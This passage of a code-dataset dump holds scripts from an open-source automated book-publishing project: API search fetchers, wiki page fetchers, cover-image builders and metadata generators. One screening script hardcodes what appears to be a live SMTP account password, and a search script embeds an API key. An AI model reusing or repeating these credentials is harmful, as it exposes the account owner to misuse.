"UTF-8", "text": "echo \"singleseed is\" ${FLAGS_singleseed}\n\nsearchterm=${FLAGS_singleseed}\n\n# echo http://api.mendeley.com/oapi/documents/search/\"$searchterm\"?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max-time 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/mendeley/$searchterm.json http://api.mendeley.com/oapi/documents/search/\"$searchterm\"?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\necho \"ran Mendeley search\" | tee --append $tiphys_log\n\n# echo \"arxiv search is\" http://export.arxiv.org/api/query?search_query=all:\"$searchterm\"&start=0&max_results=${FLAGS_rows}\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max-time 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/arxiv/$searchterm \"
http://export.arxiv.org/api/query?search_query=all:\"$searchterm\"&start=0&max_results=${FLAGS_rows}\"\n\necho \"ran arxiv search\" | tee --append $tiphys_log\n\n# echo \"plos search is \" http://api.plos.org/search?q=\"$searchterm\"&api_key=$plos_API_key\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max-time 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/plos/$searchterm \"http://api.plos.org/search?q=\"$searchterm\"&api_key=${plos_API_key}\"\n\necho \"ran PLOS search\" | tee --append $tiphys_log\n" }, { "alpha_fraction": 0.6471428275108337, "alphanum_fraction": 0.6657142639160156, "avg_line_length": 20.212121963500977, "blob_id": "86d750845fc6b5377afeaed2dd921b3f3fc2e3ab", "content_id": "13a235aa8ec87b328ddff208dc202be2e2ce7a6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 700, "license_type": "permissive", "max_line_length": 65, "num_lines": 33, "path": "/scripts_python_3/bitcoin/fortune/pk21server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport json\nimport subprocess\n\nimport yaml\n\nfrom flask import Flask\n\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# machine-payable endpoint that returns fortune if payment made\[email protected]('/buy')\[email protected](1000)\ndef buy_fortune():\n\n    fortune = subprocess.check_output(['fortune', 'potterfacts'])\n    return fortune\n    \[email protected]('/manifest')\ndef docs():\n    '''\n    Serves the app manifest to the 21 crawler.\n    '''\n    with open('manifest.yaml', 'r') as f:\n        manifest_yaml = yaml.safe_load(f)\n    return json.dumps(manifest_yaml)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6613651514053345, "alphanum_fraction": 0.6673293709754944, "avg_line_length": 33.68965530395508, "blob_id": "c64bf3a038621c62c6e209dee8099805f782baa6", "content_id": "b34f158225bbaf29d69478411712e12d83738804", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3018, "license_type": "permissive", "max_line_length": 223, "num_lines": 87, "path": "/scripts/bin/mwclient_seeds_to_pages.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwikipedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient library\nenhanced to allow pointing at any MediaWiki endpoint URL\n\nfetches MW pages specified in --infile\nmwclient_seeds_to_pages.py is responsible for providing exact page names to infile\npage names must be exact, i.e. 
are case and punctuation sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\nfrom mwclient.errors import APIError, InvalidPageTitle\nimport time\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\n#parser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'http://en.wikipedia.org/w/api.php')\n#arser.add_argument(\"--endpoint_path\", help = \"mediawiki default is /w/api.php\", default = '/w/')\n#parser.add_argument(\"--client_certificate\", help = \"path to SSL certificate\", default = None)\n#parser.add_argument(\"--tuple\", help = \"tuple with http & path\", default = 'en.wikipedia.org, )) )s, endpoint, and path\", default = ('\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\n#mediawiki_api_url = args.mediawiki_api_url\n#endpoint_path = args.endpoint_path\nfull_tuple = \"('https', 'en.wikipedia.org')\"\n#full_tuple = \"'http', {}, 'path='{}\".format(mediawiki_api_url,endpoint_path)\n#print(full_tuple)\nsite = mwclient.Site('en.wikipedia.org')\nprint(site)\n#client_certificate = args.client_certificate\n\n\"\"\"\nproviding client certificate option\nneeds testing on ssl + cert environment\n\nif client_certificate is None:\n    foo = mwclient.Site(mediawiki_api_url)\n    print(foo)\nelse:\n    print('client certificate is ' + client_certificate )\n    ssl_site1 = mediawiki_api_url + ', ' + 'client_certificate' + '='\n    print('ssl site 1 is' + ssl_site1)\n    ssl_site2 = ssl_site1 + client_certificate\n    print(ssl_site2)\n\"\"\"\n#site = mwclient.Site(mediawiki_api_url, 'path='wikipath)\n\nfile = open(input_file, 'r').read().splitlines()\nfile2 = open(output_file, 'wb')\nfor line in file:\n    try:\n        print(line)\n        page = site.pages[line]\n        print(page)\n        text = page.text()\n        print(text)\n        # print(text)\n    except (APIError, InvalidPageTitle):\n        continue\n    file2.write(b'\\n')\n    print(text.encode('utf-8'))\n    file2.write(b'\\n')\n    file2.write(b'# ' )\n    file2.write(line.encode('utf-8'))\n    file2.write(b'\\n')\n    file2.write(text.encode('utf-8'))\nfile2.close()\n" }, { "alpha_fraction": 0.6410256624221802, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 18.5, "blob_id": "a22a1f04338d24bb477a4789d3fafef61fc6353e", "content_id": "cb1a5161cd50095b1d8771530fdaaa331351c872", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 41, "num_lines": 4, "path": "/scripts/SKU.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread COUNT < $LOCAL_DATA\"SKUs/sku\"\necho $COUNT\necho $((COUNT+1)) > $LOCAL_DATA\"SKUs/sku\"\n" }, { "alpha_fraction": 0.5508555173873901, "alphanum_fraction": 0.553231954574585, "avg_line_length": 26.6842098236084, "blob_id": "2d42f40303233ec41de9636b1295987615091ee1", "content_id": "9db85a12f8b2ea86f33844f376004768a9986dc9", "detected_licenses": [ "Apache-2.0" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2104, "license_type": "permissive", "max_line_length": 78, "num_lines": 76, "path": "/scripts/bin/nervNG.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Fred Zimmerman\n# \n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file \n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name \n# Outputs:\n# Output file written\n#\n###################################################\n\n\nfrom alchemyapi import AlchemyAPI\nimport json\nimport argparse\nimport os\n\n#=================================================\ndef listwrite(output_file,thelist):\n for item in thelist:\n item.encode('utf-8')\n output_file.write(\"%s\\n\" % item)\n\n#=================================================\n \ndef main():\n\n tmpdir = \"/tmp/pagekicker\"\n\n #personal api key saved as api_key.txt\n parser = argparse.ArgumentParser()\n parser.add_argument('--infile', help = \"target file or directory for NER\")\n parser.add_argument('--outfile', help = \"target file for output\")\n parser.add_argument('--uuid', help = \"uuid\")\n args = parser.parse_args()\n \n in_file = args.infile\n out_file = args.outfile\n uuid = args.uuid\n folder = os.path.join(tmpdir, uuid)\n print(folder)\n cwd = os.getcwd()\n apikey_location = os.path.join(cwd, \"api_key.txt\")\n print(in_file)\n with open(in_file) as f:\n filetext = f.read()\n return filetext\n\nfiletext = main()\n\nalchemyapi = AlchemyAPI()\n \nresponse = alchemyapi.entities('text', filetext, {'sentiment': 1})\n\nif response['status'] == 'OK':\n\n print(json.dumps(response, indent=4))\n\n for entity in response['entities']:\n print('text: ', entity['text'].encode('utf-8'))\n print('type: ', entity['type'])\n print('relevance: ', entity['relevance'])\n print('sentiment: ', entity['sentiment']['type'])\n if 'score' in entity['sentiment']:\n print('sentiment score: ' + entity['sentiment']['score'])\n print('')\nelse:\n print('Error in entity extraction call: ', response['statusInfo'])\n\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.737500011920929, "alphanum_fraction": 0.7666666507720947, "avg_line_length": 39, "blob_id": "9cb5227fc8dad54e1480cbdbdb52a72c790ddf65", "content_id": "65ba9a4d36d4003b026c3feb02eb0045d3c3d90d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 240, "license_type": "permissive", "max_line_length": 72, "num_lines": 6, "path": "/scripts/includes/fable.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# booktype = fable\n# length = 300 to 1000 words\n# average sentence length =\n# protagonists = archetypal characters without name\n# structure = induction, action, moral\n# theme = abstract morality words such as responsibility, prudence, love\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.635395884513855, "avg_line_length": 18.256410598754883, "blob_id": "56a97d5347dcc8961e32da2482f53f458e4c52c8", "content_id": "ccfae9ee0a5240a8b4f259a0a8133b61c9dafb16", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1503, "license_type": "permissive", "max_line_length": 97, "num_lines": 78, "path": 
"/scripts/corpus_processor.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# processes robot or user's corpus directory\n\n\n# input: directory path that contains txt files with txt extension\n# note - this would break on splitter output - fix\n# output - unified wordcloud\n\nwordcloud=\"off\"\nstopimagefolder=\"none\"\noutdir=\"\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtdir)\ntxtdir=$2\nshift 2\n;;\n--txtdir=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--wordcloud)\nwordcloud=$2\nshift 2\n;;\n--wordcloud=*)\nwordcloud=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtdir\" ]; then\n echo \"ERROR: option '--txtdir[txtdir]' not given. See --help\" >&2\n exit 1\nfi\n\ncorpusname=`basename \"$txtdir\"`\necho corpusname is $corpusname\ncat \"$txtdir\"*.txt > \"$txtdir$corpusname\"\".txt\"\nbin/wordcloudwrapper.sh --txtinfile \"$txtdir$corpusname\"\".txt\" --outfile \"$txtdir$corpusname.png\"\necho \"concatenated corpus of\" $corpusname \"and did wordcloud from it\"\n\n" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 14.142857551574707, "blob_id": "5ba398341dc38599ae06f4a1bc8618b63a8e832d", "content_id": "69917ddfc2a5efe6ed734b4ccf9d408c56017a26", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 109, "license_type": "permissive", "max_line_length": 37, "num_lines": 7, "path": "/scripts/cat_w_filename.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfor i in $* \ndo\n\techo $i\n\techo \"from file\" $i >> oneliners.txt\n\tcat $i >> oneliners.txt\ndone\n\n\n\n" }, { "alpha_fraction": 0.6352674961090088, "alphanum_fraction": 0.6541070342063904, "avg_line_length": 28.488889694213867, "blob_id": "0d7c63022fbffb5499858adc2f668a32db2a5a2d", "content_id": "4392e4215c9dd898eb3a64e88c1201ed4cc24d3e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1327, "license_type": "permissive", "max_line_length": 98, "num_lines": 45, "path": "/scripts_python_3/bin/csvreader.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# reads rows of csv one at a time \n# code by @martineau \n# http://stackoverflow.com/questions/38489761/how-can-i-select-only-a-particular-row-in-a-csv-file\n\nimport csv\nfrom contextlib import contextmanager\nimport sys\nimport itertools\nimport os\n\n@contextmanager\ndef multi_file_manager(files, mode='w'):\n \"\"\" Context manager for multiple files. \"\"\"\n files = [open(file, mode) for file in files]\n yield files\n for file in files:\n file.close()\n\ndef csv_read_row(filename, n):\n \"\"\" Read and return nth row of a csv file, counting from 1. 
\"\"\"\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n return next(itertools.islice(reader, n-1, n))\n\nif len(sys.argv) != 4:\n print('usage: utility <csv filename> <uuid> <target row>')\n sys.exit(1)\n\ntmpdir = \"/tmp/pagekicker\"\nf = sys.argv[1]\nuuid = sys.argv[2]\ntarget_row = int(sys.argv[3])\nfolder = os.path.join(tmpdir, uuid)\n\n\ndestinations= [folder+dest for dest in ('/csv/row.editedby', \n'/csv/row.booktitle', \n'/csv/row.seeds', \n'/csv/row.imprint', '/csv/row.add_this_content')]\n\nwith multi_file_manager(destinations, mode='w') as files:\n row = csv_read_row(f, target_row)\n #editedby, booktitle, seeds, imprint = row[0], row[2], row[3], row[4]\n for i,j in zip(list(range(5)), (0, 2, 3, 4, 5)):\n files[i].write(row[j]+'\\n')\n" }, { "alpha_fraction": 0.7101449370384216, "alphanum_fraction": 0.7246376872062683, "avg_line_length": 33.5, "blob_id": "f530b42fa0a7e08e0d27c360dff2f26cbb3f10dc", "content_id": "b20f153580b8d3d52703b42f9d148829fe493b2e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 56, "num_lines": 2, "path": "/test/prsoop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /path/to/test/prsoop.csv 6\n" }, { "alpha_fraction": 0.663838803768158, "alphanum_fraction": 0.663838803768158, "avg_line_length": 61.86666488647461, "blob_id": "b5288eadb286d531acdaa5d07aaa80d0bb87bc3b", "content_id": "1844a7fb17a05d25e48d92a87701556bed86e06e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 943, "license_type": "permissive", "max_line_length": 269, "num_lines": 15, "path": "/scripts/includes/changelog.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"# Changelog\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"A key advantage of the PageKicker system is that the software is always improving. This is the way we keep track of the feature enhancements and bug fixes. For more info, see the open source repository at \"$COMMUNITY_GITHUB_REPO \".\" >> \"$TMPDIR\"$uuid/changelog.md\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"## Version\" >> \"$TMPDIR$uuid/changelog.md\"\necho \"Version number is \" $SFB_VERSION\".\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"## Commits\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\nbin/git_show_tags.sh | sed G | tac >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\n" }, { "alpha_fraction": 0.7615230679512024, "alphanum_fraction": 0.7735471129417419, "avg_line_length": 48.900001525878906, "blob_id": "69d879fc365548a1feea4bdadea801545ef55d21", "content_id": "ce105833ccfc586e541cf642d2d18c7e937db236", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 499, "license_type": "permissive", "max_line_length": 130, "num_lines": 10, "path": "/scripts/bin/regressions.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. 
../conf/config.txt\n\necho \"running jobprofile Noir\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --jobprofile Noir.jobprofile 1> /dev/null\necho \"running jobprofile Hemingway\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --jobprofile Hemingway.jobprofile 1> /dev/null\necho \"running countries seedfile (10 docs) with rows set to 1\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --seedfile seeds/test/countries --fetched_document_format \"html\" --rows 1\n" }, { "alpha_fraction": 0.7233316898345947, "alphanum_fraction": 0.745007336139679, "avg_line_length": 37.37383270263672, "blob_id": "6ac5842ff81eb0cb3a7ff8a89d33cce93face438", "content_id": "6547335b9759d75a406299bffb99644cd64c66d4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4106, "license_type": "permissive", "max_line_length": 233, "num_lines": 107, "path": "/scripts/includes/builder-cover.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# build cover\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\ncp $confdir\"jobprofiles\"/signatures/$sigfile \"$TMPDIR\"$uuid/$sigfile\n\n#select wordcloud stopfile\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"it\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/it\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n#rotate stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating stopfile into place\"\n\tcp \"$stopfile\" \"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# wordcloud is retired\n#\t\"$JAVA_BIN\" -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w \"1800\" -h \"1800\" < \"$TMPDIR\"$uuid/wiki/wiki4cloud.md > \"$TMPDIR\"$uuid/cover/wordcloudcover.png 2> /dev/null\n\n# convert -size 1800x2400 \"$TMPDIR\"$uuid/cover/wordcloudcover.png\n\n#copying old stopfile backup to overwrite rotated stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating old stopfile back in place\"\n\tcp $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# set font & color\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\tcoverfont=`./bin/random-line.sh ../conf/fonts.txt`\n\techo \"random coverfont is \" $coverfont\n\nelse\n\tcoverfont=$coverfont\n\techo \"using specified cover font\" $coverfont\nfi\n\n\nif [ \"$covercolor\" = \"Random\" ]; then\n\tcovercolor=`./bin/random-line.sh ../conf/colors.txt`\n\techo \"random covercolor is \" $covercolor\nelse\n\tcovercolor=$covercolor\n\techo \"using specified covercolor \"$covercolor\n\nfi\n\necho \"covercolor is\" $covercolor\necho \"coverfont is\" $coverfont\n\n#create base canvases\n\nconvert -size 1800x2400 xc:$covercolor \"$TMPDIR\"$uuid/cover/canvas.png\nconvert -size 1800x800 xc:$covercolor 
\"$TMPDIR\"$uuid/cover/topcanvas.png\nconvert -size 1800x400 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomcanvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/toplabel.png\nconvert -size 1800x200 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# underlay canvas\n\n\n# build top label\n\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size 1800x2400 -font \"$coverfont\" caption:\"$booktitle\" \"$TMPDIR\"$uuid/cover/topcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/toplabel.png\n\n#build bottom label\n\necho \"yourname is\" $yourname\nif [ \"$yourname\" = \"yes\" ] ; then\n\teditedby=\"$human_author\"\nelse\n\techo \"robot name on cover\"\nfi\n#editedby=\"PageKicker\"\necho \"editedby is\" $editedby\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity south -size 1800x394 \\\n -font \"$coverfont\" caption:\"$editedby\" \\\n \"$TMPDIR\"$uuid/cover/bottomcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# resize imprint logo\n\nconvert \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" -resize x200 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\n# lay the labels on top of the target canvas\n\ncomposite -gravity center \"$TMPDIR\"$uuid/cover/toplabel.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/step1.png\ncomposite -geometry +0+1800 \"$TMPDIR\"$uuid/cover/bottomlabel.png \"$TMPDIR\"$uuid/cover/step1.png \"$TMPDIR\"$uuid/cover/step2.png\ncomposite -gravity south -geometry +0+0 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/step2.png \"$TMPDIR\"$uuid/cover/cover.png\nconvert \"$TMPDIR$uuid/cover/cover.png\" -border 36 -bordercolor white \"$TMPDIR$uuid/cover/bordercover.png\"\nconvert \"$TMPDIR$uuid/cover/bordercover.png\" \"$TMPDIR$uuid/cover/$sku\"\"ebookcover.jpg\"\nconvert \"$TMPDIR$uuid/cover/bordercover.png\" \"$TMPDIR$uuid/ebookcover.jpg\"\n" }, { "alpha_fraction": 0.8362069129943848, "alphanum_fraction": 0.8362069129943848, "avg_line_length": 153.6666717529297, "blob_id": "63cd17e00d2010f57cf67411488fe35c243f5f3a", "content_id": "8955d606a6fbe3f6519d446d7b2bccf93231dcca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 442, "num_lines": 3, "path": "/conf/jobprofiles/imprints/wapacklabs/wapacklabs_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About Wapack Labs\n\n Wapack Labs is a privately held cyber intelligence and threat analysis firm serving companies and organizations around the globe by providing early warning threat detection through internet surveillance operations, data gathering, and in-depth analysis of economic, financial, and geopolitical issues. 
Intelligence information is shared with clients through an array of packages to meet both their cyber security needs and their bottom line.\n" }, { "alpha_fraction": 0.7245762944221497, "alphanum_fraction": 0.7881355881690979, "avg_line_length": 39.33333206176758, "blob_id": "99b78fbb98e32ec230c9a1cfeeaa9b8f60ce0b94", "content_id": "8e5b74585767c57740c1deec998f60826a149400", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 236, "license_type": "permissive", "max_line_length": 75, "num_lines": 6, "path": "/test/test-fetch-3dparty.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "cd ~/pagekicker-community/scripts/lib\ngit clone https://github.com/jarun/googler.git\nmkdir KindleGen\ncd KindleGen\nwget http://kindlegen.s3.amazonaws.com/kindlegen_linux_2.6_i386_v2_9.tar.gz\ntar -xvf kindlegen_linux_2.6_i386_v2_9.tar.gz\n" }, { "alpha_fraction": 0.6763485670089722, "alphanum_fraction": 0.6836099624633789, "avg_line_length": 25.77777862548828, "blob_id": "5953aab7a8125b6db3fc578394069cdce74fb", "content_id": "cf64914fa137a62750c3bac578394069cdce74fb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 964, "license_type": "permissive", "max_line_length": 95, "num_lines": 36, "path": "/scripts/screen-naughty-and-duplicate-seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\n# echo \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nwhile read -r line; do \n\nif grep -q \"$line\" \"seeds/disallowed-seeds.txt\" ; then \n\techo \"ncp_err_code:disallowed the seed \"$line \"was disallowed\" | tee --append $sfb_log\n    # figure out how to send an error report to the user here\n\tpk_err_code=\"disallowed\"\n\techo \"pk_err_code is\" $pk_err_code\nsendemail -t \"$customer_email\" \\\n\t-m \"This book build has been cancelled because the seeds included the disallowed word $line\" \\\n\t-f [email protected] \\\n\t-cc [email protected] \\\n\t-xu [email protected] \\\n\t-xp \"f1r3comb\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\n#elif grep -q \"$line\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\n#then \n#\techo \"ncp_err_code:duplicate the seed \"$line \" is a duplicate\" | tee --append $sfb_log\n\n    # # figure out how to send an error report to the user here\n\nelse\n#\techo $line | tee --append $LOCAL_DATA\"allowed/allowed-history.txt\"\n\techo \"pass\"\nfi\n\ndone < $1\n\nexit 0\n" }, { "alpha_fraction": 0.6596638560295105, "alphanum_fraction": 0.674369752407074, "avg_line_length": 17.69230842590332? , "blob_id": "c7cbad4a2937dd16fc8db31adb3f1ae89419cf7d", "content_id": "8924cbd07461c8fe2ca23189125757d5d47cbef3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 476, "license_type": "permissive", "max_line_length": 71, "num_lines": 26, "path": "/scripts/timestamper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Generate a current unix timestamp\n#\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime\n\nspecial_from=$createtime\n\n# Adjust the timestamp above by +4 hours\n\nhours=4\n\nspecial_lasts_sec=$(( $hours * 60 * 60 ))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" 
$special_to\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nexit\n0\n" }, { "alpha_fraction": 0.7174071669578552, "alphanum_fraction": 0.7217771410942078, "avg_line_length": 23.675676345825195, "blob_id": "b6dd95b892fb097ef7aebddd2c3bb649308421e7", "content_id": "6eb9c4b0ff44c1c450c65be697cee168418d2284", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2746, "license_type": "permissive", "max_line_length": 130, "num_lines": 111, "path": "/scripts/includes/bookshelf-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " # builds metadata footer for public bookshelf categories\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n# rootid\nrootid=2 # for PageKicker main\n\necho -n \"$rootid,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# store\n\nstorecode=\"default\" # for PageKicker main\necho -n \"$storecode,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_id\n\necho -n \"$catid,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# name\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# description\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n#categories\n\necho -n \"Customer Bookshelf/$customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# url_key\n\nsafe_url_key=$(echo \"$customer_name\" | sed -e 's/[^A-Za-z0-9._-]/-/g')\n\necho -n $\"$safe_url_key,\" >> 